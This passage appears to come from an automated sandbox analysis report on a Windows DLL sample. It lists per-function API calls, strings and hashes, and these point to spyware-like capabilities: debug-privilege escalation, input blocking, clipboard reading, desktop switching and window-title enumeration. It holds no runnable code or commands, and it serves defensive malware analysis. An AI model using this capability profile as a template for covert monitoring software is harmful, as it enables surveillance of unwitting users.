                                                  • LocalReAlloc.KERNEL32(?,00000001,00000042), ref: 1002AEA0
                                                  Strings
                                                  • Favorites, xrefs: 1002AE4D
                                                  • P, xrefs: 1002AE18
                                                  • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 1002AE28
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocLocallstrcat$CloseFileFindFirstOpenQueryValue
                                                  • String ID: Favorites$P$Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                  • API String ID: 3779601296-2418616894
                                                  • Opcode ID: a8d8ff9fcbd12a0f3c28fe7179bea7efc04e8266e358b229fc4b4cde101c045e
                                                  • Instruction ID: 42e8c65be68f3a94c8a2d09bd038b3f1d25a706c740ab1906cecab214c4d0d89
                                                  • Opcode Fuzzy Hash: a8d8ff9fcbd12a0f3c28fe7179bea7efc04e8266e358b229fc4b4cde101c045e
                                                  • Instruction Fuzzy Hash: E311C1B4208301FFE300DF14CC86F9A77A5FB88304F508E1DF648A26A1D7B894488B66
                                                  APIs
                                                    • Part of subcall function 100290C0: GetCurrentProcess.KERNEL32(00000028), ref: 100290D0
                                                    • Part of subcall function 100290C0: OpenProcessToken.ADVAPI32(00000000), ref: 100290D7
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 10029177
                                                  • Thread32First.KERNEL32(00000000,0000001C), ref: 10029184
                                                  • Thread32Next.KERNEL32(00000000,0000001C), ref: 1002919F
                                                  • OpenThread.KERNEL32(001F03FF,00000000,?,00000004,00000000), ref: 100291B2
                                                  • ResumeThread.KERNEL32(00000000), ref: 100291BB
                                                  • CloseHandle.KERNEL32(00000000), ref: 100291C2
                                                  • CloseHandle.KERNEL32(00000000,00000004,00000000), ref: 100291C5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseHandleOpenProcessThreadThread32$CreateCurrentFirstNextResumeSnapshotTokenToolhelp32
                                                  • String ID: SeDebugPrivilege
                                                  • API String ID: 2312015761-2896544425
                                                  • Opcode ID: 92575825664269da82754a126b87f41c0fa238dd4cdd121b5c861b03491c7cf0
                                                  • Instruction ID: 5baa37ad70a989ad156aa77d6f180d112f87292081aecf7063da644eb0796895
                                                  • Opcode Fuzzy Hash: 92575825664269da82754a126b87f41c0fa238dd4cdd121b5c861b03491c7cf0
                                                  • Instruction Fuzzy Hash: 9501A935244204BFF200EBA99C86FAF77A8FF85B90F844519FA0486281D671AD058BB7
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(dwmapi.dll,10098B10,1001767F), ref: 10017486
                                                  • GetProcAddress.KERNEL32(00000000,DwmIsCompositionEnabled), ref: 1001749F
                                                  • GetProcAddress.KERNEL32(00000000,DwmEnableComposition), ref: 100174AB
                                                    • Part of subcall function 10017460: #102.DWMAPI(00000000,100174B6), ref: 1001746B
                                                  • FreeLibrary.KERNEL32(00000000), ref: 100174B7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryProc$#102FreeLoad
                                                  • String ID: DwmEnableComposition$DwmIsCompositionEnabled$dwmapi.dll$Wu
                                                  • API String ID: 921056788-1252603044
                                                  • Opcode ID: e7bc18532d82db7781f6db1b43c4f4c4d0ba297617c9142dcf3622deb4fcc179
                                                  • Instruction ID: ec8973c85b4295611fe6e660086daf7ad590bfada4181087f49f392a1ed51eb0
                                                  • Opcode Fuzzy Hash: e7bc18532d82db7781f6db1b43c4f4c4d0ba297617c9142dcf3622deb4fcc179
                                                  • Instruction Fuzzy Hash: 29E0123A502D3A679251F72D5C14DCF2AA8FF867E13464251FD08F6114DB24DD4289B6
                                                  APIs
                                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,000F003F,?), ref: 10015221
                                                  • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000,?,00000000,000F003F,?), ref: 10015257
                                                  • LocalAlloc.KERNEL32(00000040,?,?,?,?,00000000,000F003F,?), ref: 100152AB
                                                  • malloc.MSVCRT ref: 100152EC
                                                  • malloc.MSVCRT ref: 100152F7
                                                  • RegEnumValueA.ADVAPI32(?,?,?,?,00000000,?,?,?), ref: 10015381
                                                  • free.MSVCRT ref: 10015418
                                                  • free.MSVCRT ref: 1001541F
                                                  • LocalReAlloc.KERNEL32(00000000,?,00000042), ref: 10015428
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocLocalfreemalloc$EnumInfoOpenQueryValue
                                                  • String ID:
                                                  • API String ID: 1291067549-0
                                                  • Opcode ID: 70730c2a36e0dd9a8ee3e77033d8e79970e5c7148256659a69bce964993824cd
                                                  • Instruction ID: 5915bfdc95f607c6d5eb67979cc6f14533ef2d4ee1d7cd6938408f8d64ec304b
                                                  • Opcode Fuzzy Hash: 70730c2a36e0dd9a8ee3e77033d8e79970e5c7148256659a69bce964993824cd
                                                  • Instruction Fuzzy Hash: 6471D1716083059FD718CF28C880B6BBBE9FBC8745F484A1DF9869B350DA71EA44CB52
                                                  APIs
                                                  • CreateRectRgnIndirect.GDI32(?), ref: 10018486
                                                  • GetRegionData.GDI32(00000000,00000000,00000000), ref: 1001851A
                                                  • #823.MFC42(00000000,?,?,?,?,?,?,00000001,?,?,?), ref: 1001851F
                                                  • GetRegionData.GDI32(00000000,00000000,00000000), ref: 10018530
                                                  • DeleteObject.GDI32(?), ref: 10018537
                                                  • #825.MFC42(00000000,00000000,00000000,?,?,00000001,?,?,?,?,?,?,?,?,?,10016B8A), ref: 10018547
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DataRegion$#823#825CreateDeleteIndirectObjectRect
                                                  • String ID:
                                                  • API String ID: 643377033-0
                                                  • Opcode ID: 001346d870f36c53a5a7599e2016c51c9870b5627219f4efa7edda646e5686e0
                                                  • Instruction ID: 3140f93dabf97cb7bd3e409eff6f417ecd497d9d1c0577791c74c40de05a7771
                                                  • Opcode Fuzzy Hash: 001346d870f36c53a5a7599e2016c51c9870b5627219f4efa7edda646e5686e0
                                                  • Instruction Fuzzy Hash: F85181B56087028BD314DF29D880A5BB7E6FFC8710F15492DF48ACB311EB74EA458B56
                                                  APIs
                                                  • GetWindowTextA.USER32(?,?,000003FF), ref: 10029EA4
                                                  • IsWindowVisible.USER32 ref: 10029EB3
                                                  • lstrlenA.KERNEL32(?), ref: 10029ECC
                                                  • LocalAlloc.KERNEL32(00000040,00000001), ref: 10029EDF
                                                  • LocalSize.KERNEL32 ref: 10029EEF
                                                  • lstrlenA.KERNEL32(?), ref: 10029F0D
                                                  • LocalReAlloc.KERNEL32(?,?,00000042), ref: 10029F19
                                                  • GetWindowThreadProcessId.USER32(?), ref: 10029F26
                                                  • lstrlenA.KERNEL32(?,?,?,?,00000042), ref: 10029F34
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LocalWindowlstrlen$Alloc$ProcessSizeTextThreadVisible
                                                  • String ID:
                                                  • API String ID: 925664022-0
                                                  • Opcode ID: bdfcf0507623c4ea93ccd5645be1c1770e5c62d3ec9ad61f7fed79ab38ba254a
                                                  • Instruction ID: add1fb3533e99334b1788f801bc1a9e543b8ff74f7df4c1f04976087df14b6d6
                                                  • Opcode Fuzzy Hash: bdfcf0507623c4ea93ccd5645be1c1770e5c62d3ec9ad61f7fed79ab38ba254a
                                                  • Instruction Fuzzy Hash: 2621027A2003469BE750DF24CC84BEB77A8FB84750F84452DFE49A3240DA35A80AC771
                                                  APIs
                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 1001656D
                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 10016578
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,00000000,10098A46,000000FF,1000CC5B), ref: 10016589
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,00000000,10098A46,000000FF,1000CC5B), ref: 10016594
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,10098A46,000000FF,1000CC5B), ref: 100165A3
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,10098A46,000000FF,1000CC5B), ref: 100165AC
                                                  • ReleaseDC.USER32(00000000,?), ref: 100165B7
                                                    • Part of subcall function 100167E0: sprintf.MSVCRT ref: 1001682F
                                                    • Part of subcall function 100167E0: RegOpenKeyExA.ADVAPI32(?,?,00000000,00000002,?), ref: 1001686F
                                                    • Part of subcall function 100167E0: RegSetValueExA.ADVAPI32(?,SuppressDisableCompositionUI,00000000,00000004,?,00000004), ref: 1001688E
                                                    • Part of subcall function 100167E0: RegCloseKey.ADVAPI32(?), ref: 1001689D
                                                  • BlockInput.USER32(00000000,?,?,?,?,?,?,00000000,10098A46,000000FF,1000CC5B), ref: 100165CD
                                                  • DestroyCursor.USER32(00000000), ref: 1001660A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Close$ExchangeHandleInterlockedObjectSingleWait$BlockCursorDestroyInputOpenReleaseValuesprintf
                                                  • String ID:
                                                  • API String ID: 1142494416-0
                                                  • Opcode ID: 4ceefefdeb35724f5cd5cb8af09bc795719a28882878dd3cc17cf0b47423efc6
                                                  • Instruction ID: d4b191a7be4f08d6e559449bda8c86e8365c3d0bd4d75666bcc753f4c4a699e3
                                                  • Opcode Fuzzy Hash: 4ceefefdeb35724f5cd5cb8af09bc795719a28882878dd3cc17cf0b47423efc6
                                                  • Instruction Fuzzy Hash: 00212C752407049BE614DB64CC81BD6B3E8FF88720F154A1DF26A972D0CBB5B901CB91
                                                  APIs
                                                  • GetCurrentThreadId.KERNEL32 ref: 1002C5E2
                                                  • GetThreadDesktop.USER32(00000000), ref: 1002C5E9
                                                  • GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 1002C61C
                                                  • OpenInputDesktop.USER32(00000000,00000000,02000000), ref: 1002C627
                                                  • GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 1002C64E
                                                  • lstrcmpiA.KERNEL32(?,?), ref: 1002C65D
                                                  • SetThreadDesktop.USER32(00000000), ref: 1002C668
                                                  • CloseDesktop.USER32(00000000), ref: 1002C680
                                                  • CloseDesktop.USER32(00000000), ref: 1002C683
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Desktop$Thread$CloseInformationObjectUser$CurrentInputOpenlstrcmpi
                                                  • String ID:
                                                  • API String ID: 3718465862-0
                                                  • Opcode ID: 346a97fe3b554d6ea7b4bbaf12baa1f8d932fbe5d70e927d73db7af9313f27ee
                                                  • Instruction ID: 7203b97fb3658a15e50f8a55408f95546fea7e3c6eec87968affc7e345bb74f4
                                                  • Opcode Fuzzy Hash: 346a97fe3b554d6ea7b4bbaf12baa1f8d932fbe5d70e927d73db7af9313f27ee
                                                  • Instruction Fuzzy Hash: B811EB751043196BF310DF68DC4AFDB77D8FB84700F010D19F64592191EBB4A549C7A6
                                                  APIs
                                                  • #540.MFC42(?,?,?,?,10098541,000000FF,10008360,1012B024,00000000,00000000), ref: 10010F11
                                                  • #540.MFC42(?,?,?,?,10098541,000000FF,10008360,1012B024,00000000,00000000), ref: 10010F1F
                                                  • #540.MFC42(?,?,?,?,10098541,000000FF,10008360,1012B024,00000000,00000000), ref: 10010F2C
                                                  • #541.MFC42(?,?,?,?,10098541,000000FF,10008360,1012B024,00000000,00000000), ref: 10010F39
                                                  • #540.MFC42(?,?,?,?,10098541,000000FF,10008360,1012B024,00000000,00000000), ref: 10010F46
                                                  • #540.MFC42(?,?,?,?,10098541,000000FF,10008360,1012B024,00000000,00000000), ref: 10010F53
                                                  • #540.MFC42(?,?,?,?,10098541,000000FF,10008360,1012B024,00000000,00000000), ref: 10010F60
                                                  • #540.MFC42(?,?,?,?,10098541,000000FF,10008360,1012B024,00000000,00000000), ref: 10010F6D
                                                  • #540.MFC42(?,?,?,?,10098541,000000FF,10008360,1012B024,00000000,00000000), ref: 10010F90
                                                    • Part of subcall function 100110D0: #2614.MFC42(00000000,?), ref: 100110F5
                                                    • Part of subcall function 100110D0: #2614.MFC42(00000000,?), ref: 100110FD
                                                    • Part of subcall function 100110D0: #6143.MFC42(00000000,000000FF,00000000,?), ref: 10011110
                                                    • Part of subcall function 100110D0: #2614.MFC42(00000000,000000FF,00000000,?), ref: 1001111C
                                                    • Part of subcall function 100110D0: #860.MFC42(?,00000000,000000FF,00000000,000000FF,00000000,?), ref: 10011137
                                                    • Part of subcall function 100110D0: PathGetArgsA.SHLWAPI(00000000,?), ref: 10011172
                                                    • Part of subcall function 100110D0: #860.MFC42(00000000), ref: 1001117C
                                                    • Part of subcall function 100110D0: PathRemoveArgsA.SHLWAPI(00000000), ref: 10011186
                                                    • Part of subcall function 100110D0: PathUnquoteSpacesA.SHLWAPI(00000000,?), ref: 10011191
                                                    • Part of subcall function 100110D0: _splitpath.MSVCRT ref: 100111C5
                                                    • Part of subcall function 100110D0: #860.MFC42(?,?,?,?,?), ref: 100111D6
                                                    • Part of subcall function 100110D0: #860.MFC42(?,?,?,?,?,?), ref: 100111E8
                                                    • Part of subcall function 100110D0: #6876.MFC42(0000002F,0000005C,?,?,?,?,?,?), ref: 100111F3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: #540$#860$#2614Path$Args$#541#6143#6876RemoveSpacesUnquote_splitpath
                                                  • String ID:
                                                  • API String ID: 882339912-0
                                                  • Opcode ID: bcae64db62a9173b5de6d8cd2ae765ea97d72524f73a260d54af00dd520cab45
                                                  • Instruction ID: b1f006ec1c09e58242ba318f60969b2c11d84897468487acfae0c13bde89da3f
                                                  • Opcode Fuzzy Hash: bcae64db62a9173b5de6d8cd2ae765ea97d72524f73a260d54af00dd520cab45
                                                  • Instruction Fuzzy Hash: DB213B780057818ED354CF59D642B6AFBE4FF94B10F40491DE4DA83682DB74B508CBB2
                                                  APIs
                                                  • OpenClipboard.USER32(00000000), ref: 10017C2A
                                                  • GetClipboardData.USER32(00000001), ref: 10017C36
                                                  • CloseClipboard.USER32 ref: 10017C46
                                                  • GlobalSize.KERNEL32(00000000), ref: 10017C55
                                                  • GlobalLock.KERNEL32(00000000), ref: 10017C5F
                                                  • #823.MFC42(00000001), ref: 10017C68
                                                  • GlobalUnlock.KERNEL32(?), ref: 10017C8F
                                                  • CloseClipboard.USER32 ref: 10017C95
                                                  • #825.MFC42(00000000), ref: 10017CA7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Clipboard$Global$Close$#823#825DataLockOpenSizeUnlock
                                                  • String ID:
                                                  • API String ID: 15072309-0
                                                  • Opcode ID: e4c83fdc53078b23110fe99408f6848a6625d633b3bafd07e91433b67cd46e05
                                                  • Instruction ID: 9d338dc67493be82bb18043d65382f3dd730fbe0f51d25364675624cb99999ab
                                                  • Opcode Fuzzy Hash: e4c83fdc53078b23110fe99408f6848a6625d633b3bafd07e91433b67cd46e05
                                                  • Instruction Fuzzy Hash: E001D6395046246FE710EB649C89ADB37A8FF44651F490228FD0ED7250EB75E904C6F2
                                                  APIs
                                                  • OpenClipboard.USER32(00000000), ref: 10016F1A
                                                  • GetClipboardData.USER32(00000001), ref: 10016F26
                                                  • CloseClipboard.USER32 ref: 10016F36
                                                  • GlobalSize.KERNEL32(00000000), ref: 10016F45
                                                  • GlobalLock.KERNEL32(00000000), ref: 10016F4F
                                                  • #823.MFC42(00000001), ref: 10016F58
                                                  • GlobalUnlock.KERNEL32(?), ref: 10016F7F
                                                  • CloseClipboard.USER32 ref: 10016F85
                                                  • #825.MFC42(00000000), ref: 10016F97
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Clipboard$Global$Close$#823#825DataLockOpenSizeUnlock
                                                  • String ID:
                                                  • API String ID: 15072309-0
                                                  • Opcode ID: 4072f59da86136a8181d21f34bb8e7e131716998d916dfe5853bc9eb5e6c99c2
                                                  • Instruction ID: 7427716a2ac4119ad4da49d555f0140185f668cd49e7d982ef33821d485bf08e
